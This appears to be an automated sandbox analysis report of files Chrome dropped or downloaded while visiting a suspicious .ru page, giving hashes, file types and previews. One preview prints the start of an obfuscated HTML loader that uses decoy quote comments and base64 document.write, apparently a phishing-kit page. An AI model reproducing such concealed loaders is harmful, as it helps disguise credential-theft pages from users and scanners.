                        Preview:L..................F.@.. ...$+.,....b[...D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2689
                        Entropy (8bit):4.012053012582848
                        Encrypted:false
                        SSDEEP:
                        MD5:EE71444AF43C6219914809378A568155
                        SHA1:8842028AD02BACB7A04DB439B94771A70263A373
                        SHA-256:D9FD866D52CC4D26E20276EA1827751C25FE40423D71B295FF4937366092FBEE
                        SHA-512:0778BE6412A293A928A6634D6549CEDD4118B487D427D3A42E83052720D6EE3C07CA2FD98B947EB630B68628B6095C57637FCEB11EA3253577D5F15CA13F6DFD
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 13:04:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):4.002064231785174
                        Encrypted:false
                        SSDEEP:
                        MD5:9D8F98C96EB1E425CDB2CDC771E2E07B
                        SHA1:064C63ADD7517D98685CA0BD9733FD7E52F16941
                        SHA-256:D9566F2E3C6EF021E37FEC11F493D7B0697EAD0C966514AF284B860A7C6FC8D5
                        SHA-512:B90C74BF81420DDB431794EB52788FA1C7CD37ABFC484DF4822CDAB1360A1AEE0EFF5743E20CDDC073E84993C8DD5FEFD779BD999184DE07480DCF9FAC65082E
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.........D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 13:04:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):3.989958835172032
                        Encrypted:false
                        SSDEEP:
                        MD5:A85960ABCA5B831DEC6D81F427FA1947
                        SHA1:3F4F3954ACD017540D745892ADB8E05984D05315
                        SHA-256:34C49E0C495F23A1D88D6F0400FEFFF502FEA71319E8414E385992987F19BE33
                        SHA-512:A640089CA65ECAF4F69CE8DD4D103BA85BEFA8E9F3A806A76B35B86595046BD013FEE03FE1BF47CA6E3640C5248B2710F3F1A9BEF07D8A9B736515A0D690D67A
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....v...D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 13:04:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2679
                        Entropy (8bit):3.996298227572471
                        Encrypted:false
                        SSDEEP:
                        MD5:B6A78E57B23360103F6F3A4FF9C1AA06
                        SHA1:8B1915A1AD3042D2270AB2CAA2D822DF75F76F08
                        SHA-256:19A14E3634941D28B3DDCD5B72EC7F1D7AC006F0306FA23995D8D996D6F15FC7
                        SHA-512:2D08AB53C8762FFD4DAFADA49AAF03A3CFDB2002A3571EF69C138E629693B6A92462B613A166A4E7D58ECBF5364F1FB53C9899B584E1C6E28C81458831EFA5D4
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....Ugx..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (48316), with no line terminators
                        Category:dropped
                        Size (bytes):48316
                        Entropy (8bit):5.6346993394709
                        Encrypted:false
                        SSDEEP:
                        MD5:2CA03AD87885AB983541092B87ADB299
                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                        Malicious:false
                        Reputation:unknown
                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (7361), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):19695
                        Entropy (8bit):5.884594268508182
                        Encrypted:false
                        SSDEEP:
                        MD5:93ADFD4290B296E3037ACB7A0F6D1F7A
                        SHA1:5EC2C0D2DE3C48FA775C78C7B4A4A0B43E7DB76D
                        SHA-256:6A0C96F6E87EC59DF510CE6189B090327FDBFEF9971350215796DDD6B865BCBE
                        SHA-512:E90B89372BBBAF8F6473ADE387FDAFC21B7D7A0E4830F943F888A1620669B15A0B52B9AFAFFC336F05DA816665561BEA3E10B131938BD42B277F3394C66B22C5
                        Malicious:false
                        Reputation:unknown
                        URL:https://jbgw.yzvufnxc.ru/SNNgfwO/
                        Preview: The way to get started is to quit talking and begin doing. -->.. The only place where success comes before work is in the dictionary. -->..<script>../* The starting point of all achievement is desire. */..if(atob("aHR0cHM6Ly92ai55enZ1Zm54Yy5ydS9TTk5nZndPLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWw
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (1377), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):3642
                        Entropy (8bit):5.924530168067237
                        Encrypted:false
                        SSDEEP:
                        MD5:D96C24C4203F495B9378BAE07B60DCBD
                        SHA1:1599393BC59D026FA38CB7F786850F989AE8B22F
                        SHA-256:B318A121CA23589EFAFFBC9D3CFDAFB4C2D184EFDC17E4E952C7EAB494216F5B
                        SHA-512:281BAFD2ECDBF3DDE1929AD82EA1AFBD55DCE7529EF021935EE0AE168BA199E0ED72412BDC8A7A78B81BCC1C3F844F6B1670134C453E8C50501396AFBBAA7505
                        Malicious:false
                        Reputation:unknown
                        URL:https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-
                        Preview: <html><head>.. <meta name="robots" content="noindex, nofollow">.. .. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">.. <style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.quotient {position: relative;width: 80px;height: 80px;}.quotient div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite quotient;transform-origin: 40px 40px;}.quotient div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.quotient div:first-child {animation-delay: -36ms;}.quotient div:first-child:after {top: 63px;left: 63px;}.quotient div:nth-child(2) {animation-delay: -72ms;}.quotient div:nth-child(2):after {top: 68px;left: 56px;}.quotient div:nth-child(3) {animation-delay: -108ms;}.quotient div:nth-child(3):after {top: 71px;left: 48px;}.quotient div:nth-child(4) {animation-delay: -144ms;}.quotient div:n
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (47992), with no line terminators
                        Category:dropped
                        Size (bytes):47992
                        Entropy (8bit):5.605846858683577
                        Encrypted:false
                        SSDEEP:
                        MD5:CF3402D7483B127DED4069D651EA4A22
                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                        Malicious:false
                        Reputation:unknown
                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (47694)
                        Category:downloaded
                        Size (bytes):47695
                        Entropy (8bit):5.401531363850578
                        Encrypted:false
                        SSDEEP:
                        MD5:1685878B80EECB073E51C13F17A5E530
                        SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                        SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                        SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                        Malicious:false
                        Reputation:unknown
                        URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js
                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):61
                        Entropy (8bit):3.990210155325004
                        Encrypted:false
                        SSDEEP:
                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                        Malicious:false
                        Reputation:unknown
                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 7 x 46, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):61
                        Entropy (8bit):4.068159130770307
                        Encrypted:false
                        SSDEEP:
                        MD5:4D8EF9E948B2FE272B279EA5BFB1739D
                        SHA1:2984B0C49CED53470DE2C3EC14E776152F10AC52
                        SHA-256:B1121EEA6BC3D8B4D6671450A9AAC227C75BA4664A4B483814FFCB99C5F17149
                        SHA-512:F0622E2C17431A26177C6B60F2512A991E9FD2BA37EFF2A2788ABA60E6FD23A6601EEE36B8DC9538326315C842B8460409CE52F79BE3EBE34459D212F829070A
                        Malicious:false
                        Reputation:unknown
                        Preview:.PNG........IHDR.............k..z....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65447)
                        Category:downloaded
                        Size (bytes):89501
                        Entropy (8bit):5.289893677458563
                        Encrypted:false
                        SSDEEP:
                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                        Malicious:false
                        Reputation:unknown
                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                        No static file info